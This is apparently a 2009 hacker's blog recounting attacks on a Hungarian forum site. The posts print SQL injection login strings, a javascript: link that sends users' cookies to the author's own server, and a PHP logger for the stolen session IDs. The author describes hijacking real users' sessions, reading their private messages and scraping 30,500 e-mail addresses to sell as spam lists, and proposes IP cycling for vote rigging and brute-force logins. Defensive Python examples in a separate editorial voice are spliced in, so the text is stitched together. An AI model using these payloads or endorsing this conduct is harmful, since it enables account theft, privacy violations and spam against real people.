Sunday, August 16, 2009

JALH (Just Another Lame Hack)

Not lame, the lamest. I won't describe this in every detail; it was just too lame. I was trying some other URL SQL injections on Lamer (without any great success) when I found something weird.

When submitting a post on the forum I was looking at the POST data in Fiddler, and I found my username and user ID in it. I thought it was a bad joke, a remnant from an old version... I mean, my username was already in the cookie together with my encoded password (long-term "remember me" cookies, valid for a year or so), so why require it in the form... in hidden inputs. It wasn't hidden at all.

I copied the site to a local HTML file, replaced every relative path (./) with an absolute one (http://lamer_domain.top_level_domain/) using Notepad++, removed the type="hidden" attributes from the inputs, and opened it.

There was a form where I couldn't just post a text, I could also specify who was posting it. Guess what, I picked the administrator (user ID 2). Well, I'm l33t; at least I only did this on the test page, so no real user was reading it.

I think that's all about Lamer. When I was first asked to hack Lamer, I thought that 5 successful attempts would be more than enough to be acknowledged as somebody important, so this is the point where I'll stop hunting; this was the fifth chance to do something a normal user shouldn't be able to do. Lamer isn't lame any more; moreover, it never really was. I still think it's the best site ever, and I hope one day I'll be one of its programmers. But don't worry, the world is full of hackable things, and this blog will be alive until the whole world becomes smarter than I am.

The more I hack, the more ideas I get for hacking. So please stand by; very soon you'll hear about me.

Friday, August 14, 2009

Hacking my own ISP

As you know, ISP stands for Internet Service Provider, those guys who let you connect to the Internet, usually for a particular fee. The title says hack, but it's not really a hack, rather a pretty good bug exploit.

It was before a festival; some guys got in trouble for a dirty business (nothing happened after all), but I got acquainted with one of them. He was a real hacker, without the slightest knowledge of programming. He has his own "friends", passwords, programs and money-making prospects (and I'm not talking about working here, it's more like stealing).

He lives close to me, close enough to have the same ISP. He told me that our Internet service has a bug. Our provider gives dynamic IPs (mine became static in practice, since I have a router and don't turn it off too often), which I knew about. The trick I didn't know was that different IP addresses get different bandwidths. Inside the local network (which is larger than the whole city) the speed is about 2-5 MB/s, outside it is 255-500 KB/s. But there are a few IP addresses which get more than 5 MB/s outside of the local network.

That was the time he became my customer. I had the programming knowledge, and he had everything else. He helped me a lot to create the bot which searches for an IP worth owning. It was simple: connect, calculate the bandwidth, exit if it was good enough, else disconnect and start over. For connecting and disconnecting I used RasDial, for bandwidth calculation RapidShare. The whole thing was implemented in C#.

A little reference for both of them:

I think the second link is broken, or the server is just temporarily down; either way, I'll post my complete source code:

The program is very simple. I created a file (its size is 1 MB, but it can be changed) which is uploaded each time the bandwidth is calculated. The calculation is simple too: measure the time, divide the uploaded file's size by it, then convert to KB/s.

To sum up, this wasn't that great of a hack. These IPs would have been allocated to users anyway, and a user could get one manually too; I just created a search bot to speed up the process. And I never thought about telling anyone in charge, I mean, who doesn't want speed? And why not use it, if it's already out there somewhere?

If you have a dynamic IP, RasDial with the BotNet presented in the previous post can be used on anonymous voting polls. Vote, change IP and vote again (and do not accept any cookie). Maybe someday I'll create software for that too. Another use would be brute-forcing logins. It's rustic, but impossible to create a defense against. At least I couldn't do it.

But for now, I'll stay on Lamer and attack it a few more times.

Wednesday, August 12, 2009

Fourth Attack: Click-Fraud-Bot (part 2)

At first I was thinking of getting a simple open-source browser written in C# and using its source to learn. After all, I needed an automated browser. But that was too complicated, because I didn't need the visualization of the response, just the request and response headers, and briefly the body too. A whole browser was just too much. And anyway, most of them used premade libraries which knew too much. Eh, I wanted a bit of control.

After a bit of research I decided to use the HttpWebRequest and HttpWebResponse classes, and wrote my own Browser class.

Source codes:

I used Fiddler 2 for creating the headers. I visited the website using Internet Explorer while Fiddler was open. It's a web debugger working as a local proxy, monitoring all incoming and outgoing requests. By comparing the headers created by IE with those created by my program I could get a good result pretty fast.

The biggest problem was cookies. The site needed them; a non-member user can't do almost anything. Cookies must be stored and then resent, but I just couldn't find where they appeared. I squandered a whole day just on cookies. But in the end it came out pretty good.

I regretted using C#. It's damn slow. My program too, I know, but still... it was running for half an hour. But the result was worth everything. I got a .txt file with more than 30000 e-mail addresses. It wasn't completely clean, though, because some users used their e-mail as their user ID, and by doing this they messed up 2 other e-mails. It happened thanks to an option on the profile page for visiting the previous and next profiles, these being at the top of the page. Another problem was users using @ in other fields like Name.

After another 20 minutes of cleaning the text document, I finally got what I desired. A pure 30500 e-mail addresses, each one on its own line. Each of them validated and unique (but maybe deprecated).

Think about it. You have a business, great services for a low price, but no one knows about you. Me, as your good friend, offer you 100 e-mail addresses for 1 dollar. I think at least 20 will read it, 3 of them will get interested, 2 of them will buy your service, and let's say one of them will return to you in the future. If every sale earns you, let's say, 10$, you earned around 25$ with this. By paying me 1$. Not a bad business so far, right? OK, now let's think big. I sell you all of them, 1$ per 100 e-mail addresses. I will earn 300$ and you get around 500 customers. The only loser is the administrator.

The worst is, I could have used this bot in a much better way. The site offered an e-mail system too: you fill in a form and it sends an e-mail. I found a bug whereby you could send e-mail to those members as well who hid their e-mail addresses (with a simple URL SQL injection). This way, I could have sent at least one e-mail to 52000 users without being afraid that my IP and e-mail, or those used to send the e-mail, would get on a blacklist, be blocked, be suspected as a spammer and so on. After all, it was the server that sent the e-mails.

That's all. Nothing happened on your server, but one day you see that Mozilla is giving you a warning, Opera won't let you proceed to your own website, you get errors while sending e-mails, your ISP is coming for you... big problems. Protect sensitive information!

What's the solution?

Sensitive information shouldn't be displayed as plain HTML. Use JavaScript to split up the string. Example:


<script type="text/javascript">
// Assemble the mailto link from pieces so the address is not in the raw HTML.
var at = '@';
document.write('mai'+'lto:'+'myemai'+'laddress'+at+'myemailpr'+'ovider');
</script>

The best would be to randomly cut up the string using PHP, put the pieces into variables with random names, then use them as needed; briefly, randomly generate this JavaScript from PHP. The more complicated it is, the more secure it gets.

Another method would be to generate an image which contains the e-mail address. You can do this from PHP:


<?php
header("Content-type: image/jpeg");

$Str = "myemailaddress@myemailprovider.domain";
$NewImage = imagecreatefromjpeg("img.jpg");   // background image, see below
$red = 50; $green = 50; $blue = 255;
$TextColor = imagecolorallocate($NewImage, $red, $green, $blue);
$fontSize = 8; $posX = 0; $posY = 0;
imagestring($NewImage, $fontSize, $posX, $posY, $Str, $TextColor);

imagejpeg($NewImage);        // write the JPEG to the response body
imagedestroy($NewImage);     // free the image resource
?>

If ./img.jpg looks like this:

the result is:


Much harder to hack (but don't think it's impossible). This image was generated on my local server.

Stand by, very soon another post will come.

A Newbie's Observation

There have been 4 successful attacks on Lamer so far. And one more task accomplished; I'll write about that later. I think it's enough to form a point of view about the reactions of the others, in their different positions.

The first part of the audience I would like to mention are the users of Lamer. They fell into my XSS trap without even thinking. The link didn't look normal (it started with javascript: not with http://), but even without programming knowledge, they shouldn't have been so trusting. I mean, it was a YouTube video, why not use a direct link? The attack was browser-dependent; I think IE 6 couldn't handle it. There were users who were still using that old-fashioned, really bad browser, and they went pretty far, by mentioning after my post that the link was not working. And others replied, "Yes, it does". So they double-checked it, and even after that no one had the smallest doubt. Those guys trusted me too much, just because I had been around for years. What's the moral? Do not trust anyone on the Internet.

Now let's talk about the administrator of Lamer. The site had been hacked a few times before me. There are just two types of attacks I know about: once the image upload was hacked by uploading a script, and the voting system was hacked several times. But I gained access to the whole database, several users' forum posts, user accounts and some user passwords too. That is, I think I accomplished more than everyone before. I mean, I'm not praising myself, it's just not an IT community. I'm saying that I'm starting to be a threat to Lamer. If it worked 4 times, it may happen again. As for my relationship with the administrator, well, I admire him; not everyone writes a website with several thousand lines of code by himself, others use Joomla, templates or premade scripts (just like this blog).

Briefly, we got along well. After the first attack he thanked me; after the second attack he thanked me and gave me access to a test user on Lamer, and to a test copy of Lamer on his local machine. We were discussing how he should pay me. Not with money, though, with a service. He told me that he'd mention my name in the Impression section on Lamer. My reaction was to tell him not to do it. Sites get hacked every day; I don't want to be suspected in that community if anything happens, not even if I'm the culprit. Instead I asked for the source code of the site. Not the JavaScript and HTML you can download, but the PHP you can't (in a legal and easy way; with my knowledge I'll just say I can't). He told me that he'd do it right away after installing an FTP server (that was a few days ago, still nothing, but oh well, good things don't come fast). It's a profit for both of us. I get reference material for future PHP projects (good for me), meanwhile I'll debug it (good for him).

Let's stick to the topic: people's reactions. I have a good friend, a girl, with pretty low knowledge of computers (I don't think she's not smart, yes she is, but it's not her field). It's true that it's against rule 3, but well, I told her. Her reaction: she panicked. She could never imagine that somebody could access her account just because she clicked a random link. There are cases when normal links to trusted sites are malicious too. For example, that description I gave before from the Elite Hackers' forum, hacking the LA-PD's website. It's not good for session hijacking, but good enough for downloading a key-logger.

Tuesday, August 11, 2009

Fourth Attack: Click-Fraud-Bot (part 1)

When I started writing this blog (yesterday) this was the last accomplished attack. It was just a few days ago; no change on Lamer since then. From my point of view this attack was the best ever. There wasn't any harm I could do, like in the previous cases, still I worked much more than before.

My programming knowledge is good. I mean, I have been learning programming for 7 years; I know the programming logic of more than 10 languages. Not the syntax, though; my memory is pretty bad. But with the help of the Internet I can learn almost any language in a week. XML took me 2 hours.

I noticed that pages are distinguished just by a few very easy to guess pieces of information. For example, my user page (profile, no modifying option available there) has a URL like this:

http://lamer_domain_name/user.php?userpage.9767

It's because I am the 9769th registered user. At the time of the attack there were around 52000 registered users, which means every page from

http://lamer_domain_name/user.php?userpage.1

to

http://lamer_domain_name/user.php?userpage.52000

existed and contained an e-mail address. That is, if the user hadn't chosen the "Hide e-mail" option. But even if half of the users hid it, there were more than 20000 e-mails available to me (only registered users could see others' profiles). And I wanted them. A .txt file containing several thousand e-mail addresses, one per line. The only thing remaining was to create that bot. At first I chose PHP, which would have run on the server installed on my PC. But after some struggle I was thinking, "My, my, I didn't learn that many languages to use this useless one for this task". Well, not a useless one, but yes, useless for that task. The simplest was C#.

So I chose C#.
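From the server's side, the walk from userpage.1 to userpage.52000 is very visible in the access log: one client, thousands of distinct profile ids, each one higher than the last. The following is an added example (not Lamer's code and not the bot) that flags such clients from constructed sample log lines; the log format, IPs and thresholds are assumptions.

```python
import re
from collections import defaultdict
from datetime import datetime

# Matches a profile fetch in Apache combined-log format, e.g.
#   203.0.113.7 - - [12/Aug/2009:21:00:00 +0200] "GET /user.php?userpage.1 HTTP/1.1" 200 5120 ...
USERPAGE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"GET /user\.php\?userpage\.(?P<uid>\d+) HTTP/1\.[01]" (?P<status>\d{3})'
)

def profile_views(lines):
    """Yield (client_ip, timestamp, profile_id) for every profile-page fetch."""
    for line in lines:
        m = USERPAGE_RE.match(line)
        if m:
            yield m["ip"], datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z"), int(m["uid"])

def detect_enumeration(lines, window_seconds=60, min_distinct=10, sequential_ratio=0.8):
    """Flag clients that fetch many distinct profiles inside one time window,
    mostly in steps of +1 (the userpage.1 ... userpage.52000 walk).
    Returns {ip: (distinct_profiles, sequential_steps)} for the widest such window."""
    by_ip = defaultdict(list)
    for ip, ts, uid in profile_views(lines):
        by_ip[ip].append((ts, uid))
    flagged = {}
    for ip, views in by_ip.items():
        views.sort()
        start = 0
        for end in range(len(views)):
            # Slide the window so it spans at most window_seconds.
            while (views[end][0] - views[start][0]).total_seconds() > window_seconds:
                start += 1
            ids = [uid for _, uid in views[start:end + 1]]
            distinct = len(set(ids))
            if distinct < min_distinct:
                continue
            steps = sum(1 for a, b in zip(ids, ids[1:]) if b - a == 1)
            if steps >= sequential_ratio * (len(ids) - 1) and distinct > flagged.get(ip, (0, 0))[0]:
                flagged[ip] = (distinct, steps)
    return flagged

def _line(ip, second, path):
    return '%s - - [12/Aug/2009:21:00:%02d +0200] "GET %s HTTP/1.1" 200 5120 "-" "Mozilla/4.0"' % (ip, second, path)

# Constructed sample log: one client walks userpage.1..12 one per second,
# another client browses three unrelated profiles and a forum topic.
SAMPLE_LOG = [_line("203.0.113.7", uid - 1, "/user.php?userpage.%d" % uid) for uid in range(1, 13)] + [
    _line("198.51.100.4", 5, "/user.php?userpage.9767"),
    _line("198.51.100.4", 20, "/user.php?userpage.120"),
    _line("198.51.100.4", 40, "/user.php?userpage.30055"),
    _line("198.51.100.4", 41, "/forum.php?topic.58"),
]

if __name__ == "__main__":
    for ip, (distinct, steps) in detect_enumeration(SAMPLE_LOG).items():
        print("%s: %d distinct profiles, %d sequential steps" % (ip, distinct, steps))
```

A real deployment would feed this the live log and rate-limit or challenge the flagged client; the "Hide e-mail" option only helps the users who ticked it.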

Third Attack: XSS, Cookie Hijack and Cookie Manipulation

Despite the title, it really was a single attack. After almost a whole month of learning the ways of XSS (not CSS) and cookie hijacking I started creating my own attacks. At first I thought XSS was an unbeatable prodigy, but after a while I realized it's nothing more than embedding a script written in JavaScript. Here are a few really good references for it:

Even if you don't want to read a lot, I recommend the last one. A good attack on the LA-PD's site is explained there, available for anyone.

Many things can be accomplished using XSS, but I wanted session hijacking. After reading about this in several places, I understood what I needed. A place where I could write this simple JavaScript code:


document.cookie

That's a variable which contains all of the cookies of a user. I had to save its value to a file available to me, from a script available to everyone. I found that writing this

'>

into a search box on Lamer showed me some HTML code as text. I realized this by writing every special character I could think of into the search box. So I thought, what about putting another property there, like:

' text='document.cookie'>

But it wasn't that simple. And the struggling began. I came up with a pretty good XSS string after several days of studying those on the cheat sheet, but every apostrophe used got a / sign before it after pressing the search button, so my code became unparseable and uninterpretable. I had almost given up every hope I had when I found this. A harmless little trick. I found out from this that by typing javascript:my_javascript_script in the URL bar, it's executed on the last site visited. It was browser-dependent, though.

I went to my user page and gave the following attribute to an input (I think it was my signature; it's written in BB-code):

[link=javascript:window.location = "http://www.mysite.com/myscript.php?"+document.cookie]You need to visit this[/link]

And it worked. By clicking on the link, it went to:

http://www.mysite.com/myscript.php?sitename=SinistraD%3A%3A%3A%here_was_a_hash_from_my_password; SiteNameCookieExpire=1250088989; PHPSESSID=2f65b91d6f8a72d1d5128f8afb8f67a7

This worked only if it was placed at the beginning of the input; otherwise somewhere (maybe on the server) it got an http:// at the beginning, screwing the whole thing, because http://javascript: wasn't working any more. So there was protection, but it had that little bug: it didn't work if the link was at the beginning. Thanks to that, my script did. The only thing left was to implement myscript.php. Here's the code:


<?php
$f = fopen("sessionids.txt", 'a');
fwrite($f, $_SERVER["REQUEST_URI"]."\n");
fclose($f);
header("Location: http://www.youtube.com/watch?v=wzqi1bfflDg");
?>

It saves the request URL, then redirects somewhere else, so the user won't be suspicious. After my setup was ready, I removed it from my profile and posted it on the forum, in a topic where this was expected (links to other sites, funny and/or interesting references, mostly on YouTube).
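The protection that failed here only prepended http:// to links it decided were relative, so a javascript: link at the start of the input slipped through. The robust fix is to parse the link and allow only a short list of schemes, dropping anything else no matter where in the input it sits. This is an added example, not Lamer's code; the BB-code syntax follows the post and the allowlist is an assumption.

```python
import html
import re
from urllib.parse import urlparse, urlunparse

# Schemes a forum link may point at; anything else (javascript:, data:,
# vbscript:, ...) is dropped regardless of case, position or padding.
ALLOWED_SCHEMES = {"http", "https", "ftp"}

def safe_link_target(raw):
    """Return a normalized absolute URL, or None if the target is not allowed."""
    url = raw.strip()
    # Control characters are never legitimate in a link, and are a classic way
    # to get a scheme past naive prefix checks, so reject them outright.
    if any(ord(c) < 0x20 for c in url):
        return None
    parts = urlparse(url)
    if parts.scheme == "":
        # Scheme-less input such as www.example.com/page: only now is it safe
        # to assume http, because a scheme like javascript: would have parsed.
        parts = urlparse("http://" + url)
    if parts.scheme not in ALLOWED_SCHEMES or parts.netloc == "":
        return None
    return urlunparse(parts)

BBCODE_LINK = re.compile(r"\[link=([^\]]+)\](.*?)\[/link\]", re.IGNORECASE | re.DOTALL)

def render_bbcode_link(text):
    """Expand [link=URL]label[/link]; disallowed targets keep only the label."""
    def repl(m):
        label = html.escape(m.group(2))
        target = safe_link_target(m.group(1))
        if target is None:
            return label
        return '<a href="%s" rel="nofollow">%s</a>' % (html.escape(target, quote=True), label)
    return BBCODE_LINK.sub(repl, text)
```

Marking the session cookie HttpOnly would additionally keep document.cookie from exposing PHPSESSID even if a script does run.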

I didn't have to wait long; many users fell into the trap, and the last thing remaining was to use their cookies. I logged in with my user, removed every cookie except the one containing the session ID, then modified its value to one of the captured ones. "Surprisingly", the result was that I wasn't myself any more, but the user who had clicked on the link. The task with the highest priority was to write a mail to the administrator using that account (not mine), but I had to hurry, because when you log in, the real user is logged out automatically, and when he logs back in, he gets a new session ID, making mine useless.

I had pretty much fun reading their personal messages, stored in the mail system offered by the site. It's just a PM system, not an e-mail one.

This attack was my biggest accomplishment so far. But this time I was already thinking about implementing my own self, at high speed, a robot who surfs without me: a click-fraud bot.

The Second Attack: URL SQL Injection

I tried to find many basic vulnerabilities on Lamer, and sometimes found little candidates, but in the end I realized it was nothing.

But a few days after that request, I decided to try the attack known as URL SQL injection in every place I could think of. Well, not every place, only those places where I could gain something I shouldn't have been permitted to.

After several minutes of searching I found the place I was looking for. In the forums there was an option for editing your posts in the 24 hours after posting. After every post less than 24 hours old there was a link:

http://domain_name/forum.php?postedit.58.4727.470396.147

There were many numbers. For example, the first one is the topic ID. But I really didn't know what the others were for. So I tried modifying them, adding or subtracting a bit. Modifying the second value didn't do anything. But the third value showed me other users' posts... in an input field. This way I could edit anything on the forum. Well, not really, because the numbering was distributed in a weird way. But the most recent posts were in my hands. And no one could ever know who did it (well, that is, if there was no logging behind the scenes). Unfortunately the bug didn't get fixed, not to mention that I reported it more than a month ago.
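Both the editable post link here and the forum form in the JALH post that carried the user ID share one root cause: the server trusts an identifier the client supplied instead of the identity of the logged-in session. The example below is added here (not Lamer's code) and shows the lookup-by-id alone beside a version that checks ownership and the 24-hour window, and a post-creation function that takes the author from the session; post ids, user ids and dates are constructed.

```python
from dataclasses import dataclass
from datetime import datetime, timedelta

EDIT_WINDOW = timedelta(hours=24)

@dataclass
class Post:
    id: int
    topic_id: int
    author_id: int
    body: str
    created: datetime

# Constructed sample data: post ids, authors and timestamps are invented.
POSTS = {
    470395: Post(470395, 58, 2, "admin's post", datetime(2009, 8, 12, 10, 0)),
    470396: Post(470396, 58, 9767, "my post", datetime(2009, 8, 12, 11, 0)),
    470397: Post(470397, 58, 4711, "someone else's post", datetime(2009, 8, 1, 9, 0)),
}
NOW = datetime(2009, 8, 12, 12, 0)

def load_for_edit_vulnerable(post_id):
    """The bug described in the post: whoever can guess the number gets the post."""
    return POSTS.get(post_id)

def load_for_edit(session_user_id, post_id, now=NOW):
    """Only the post's author may edit it, and only inside the 24-hour window.
    The author check uses the session, never a number from the URL."""
    post = POSTS.get(post_id)
    if post is None or post.author_id != session_user_id:
        return None
    if now - post.created > EDIT_WINDOW:
        return None
    return post

def create_post(session_user_id, form, topic_id, now=NOW):
    """Author comes from the server-side session; any user_id field the client
    sends in the form (hidden or not) is simply not consulted."""
    post_id = max(POSTS) + 1
    post = Post(post_id, topic_id, session_user_id, form["body"], now)
    POSTS[post_id] = post
    return post
```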

Monday, August 10, 2009

My Rules of Being a Hacker

1. Don't do anything illegal until the victim grants you the right.

2. If you succeed, that is, you perform a successful attack or you find a hole, you must tell those who are in charge of security.

3. If you succeed, that is, you perform a successful attack or you find a hole, you cannot tell anyone about it, except those mentioned in rule 2.

4. Do not destroy. Be a read-only hacker. If you don't know what you are doing and can't predict the result, do it on a test area, or ask the administrator whether that is a vulnerability or just seems so.

5. You must not sell the information you got after successful hacks.


The only rude thing I can't make a rule about is not learning. What I mean here is that after every successful attack I saved all the information, including letters, conversations, e-mail addresses and so on. I observe rule 1 with this, because when I am hacking, I am doing it on request, so the victim granted me the right. This is information available to the victim, and now to me too.

You may think that by writing this blog I'm infringing rule 3. That's not true. You who are reading this know me as a hacker, and that's all. From the world I hack no one will come here, and from here no one will go there. This is why I never tell you Lamer's real domain name, valid links, and so on. There are plenty of Sinistras out there (don't even try searching Google), so you'll never know which ones are my users (at least I hope so). Anyway, if it did really happen a few times, why would it matter?

I'm not writing this to show you how great I am; I'll just give you a little material if you want to learn.

First Attack: SQL Injection

When I first searched for hacking references (after getting this real-life mission), I found a pretty good introduction. It was the first hit on Google.

After I understood that technique (I think it's pretty simple) I was thinking, "No way that could work here", but then, "Oh well, let's try at least". I went to the victim's site's main page (I'll call it Lamer hereafter, even though I admire that work). There is a login form. So I typed the following as username and password:

'

If you enter a wrong username/password combination, you get a warning, a cute little girl saying that you're not doing it the right way, but this time there was an SQL error. Something like "syntax error near..." and it gave me a string. Yeah, a bit of the SQL code from a stored procedure.

I knew I was in; I just had to use the hole to create a fake login. But a little problem occurred there. The user string from the password input was used in a function, not in a condition. It couldn't be helped; after 1 day of struggle I gave up and wrote to the system administrator about the hole. I just couldn't accept losing and tried over and over again, but with no success. I could tell that a string like this:

mypassword') or ('1'='1

was working, but no other variation. And this wasn't good either if I left the mypassword part off. Yes, like this I could even have deleted the whole database by writing multiple queries there, but I couldn't log in as somebody else.

The bug got fixed. It was my loss. After a while I went back to check out the bugfix, and it was true: the apostrophe in the password input gave me a handled error, not an SQL one. But...

The username input still lacked the bugfix. Then I had my grand return. I wrote the following inputs:

username: ') or ('1'='1
password: butterfly

And ta-daaaam, I was logged into a simple unused account. Well, I'll explain this: the username condition is always true, so that was the first user in the database whose password was butterfly (it was a girl, I mean no offense... but so naive).
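Why the injected username logs in as "the first user whose password was butterfly" follows from operator precedence once the query is written out, and why the password field resisted the same trick is that it passes through a function before reaching the SQL text. The following added example (not Lamer's code) reproduces that query shape against a constructed SQLite user table and shows the parameterized version that makes the same input harmless; the table contents and the sha256 stand-in for a real password hash are assumptions.

```python
import hashlib
import sqlite3

def _h(password):
    """Stand-in for a real password hash (use bcrypt or argon2 in production).
    Because the password is hashed before it reaches the query, injecting
    into the password field changes nothing; only the raw username is concatenated."""
    return hashlib.sha256(password.encode()).hexdigest()

def make_db():
    """Constructed sample user table; names and passwords are invented."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password_hash TEXT)")
    db.executemany("INSERT INTO users VALUES (?, ?, ?)", [
        (1, "admin", _h("correct horse battery staple")),
        (2, "alice", _h("butterfly")),
        (3, "bob", _h("hunter2")),
    ])
    return db

def login_vulnerable(db, username, password):
    """Mirrors the bug from the post: the username is pasted into the SQL text.
    With username  ') or ('1'='1  the WHERE clause becomes
      (username = '') or ('1'='1') AND (password_hash = '<hash of password>')
    and since AND binds tighter than OR, any row whose hash matches is returned."""
    sql = ("SELECT id, username FROM users WHERE (username = '%s') "
           "AND (password_hash = '%s')" % (username, _h(password)))
    return db.execute(sql).fetchone()

def login_fixed(db, username, password):
    """Same query with bound parameters: the input is data, never SQL syntax."""
    sql = "SELECT id, username FROM users WHERE (username = ?) AND (password_hash = ?)"
    return db.execute(sql, (username, _h(password))).fetchone()

PAYLOAD = "') or ('1'='1"   # the username from the post, verbatim

if __name__ == "__main__":
    db = make_db()
    print("vulnerable:", login_vulnerable(db, PAYLOAD, "butterfly"))  # (2, 'alice')
    print("fixed:     ", login_fixed(db, PAYLOAD, "butterfly"))       # None
```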

You may ask what I felt when I took a greedy look at my first successful hacker attack, which I had dreamed of for a long time. Well, I was a bit disappointed. It was because I had to choose between telling everyone in a fancy way, "look what I have done", or telling the administrator and remaining nameless forever. But that's it. I had to remember my rules of being an elite hacker.

The Beginning

In the beginning I was playing hacker games: exploitable web pages made to be hacked. There was a Hungarian website supported by Microsoft, but those missions are long gone, so I won't give you any link. Today some cryptographic missions can be found there, not too interesting. Of the 10 missions available I think I succeeded at 8 of them.

Then I went out in search of other hacker games, and I found http://www.hackthissite.org and some other sites, but I couldn't even complete the basic missions. Looking at the solutions just took away the fun.

When I couldn't think of anything new, I started writing my own web page, with the intention of making its code public. By the time I finished the registration system of the website I got bored, and stopped building it. That was... hacking as a game.

But then something changed. In response to a topic post of mine, somebody asked me to test his page's hackable points. Briefly, he asked me to hack his web page. It was one of those web pages I really knew. It was almost the first site I hung out on after getting Internet (a few years ago). It's the biggest Hungarian site on its topic, with more than 50000 registered users. Its code is huge, with almost any service you can think of: login system, forum, image gallery, PM system, torrent tracker, file exchange and many more. When I tried writing my own web sites I used its HTML and CSS code for reference.

That was it; I started studying attacks against websites in order to hack that website. And when I first found a hole, I couldn't believe my eyes.